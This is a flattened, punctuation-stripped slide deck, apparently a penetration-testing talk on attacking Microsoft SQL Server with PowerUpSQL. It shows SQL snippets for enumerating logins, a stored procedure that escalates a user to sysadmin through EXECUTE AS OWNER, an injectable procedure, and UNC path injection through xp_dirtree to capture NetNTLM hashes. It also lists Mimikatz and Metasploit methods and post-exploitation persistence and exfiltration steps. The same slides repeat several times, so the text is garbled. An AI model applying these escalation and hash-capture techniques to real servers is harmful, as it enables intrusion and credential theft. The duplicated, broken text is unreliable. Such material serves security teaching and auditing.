DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
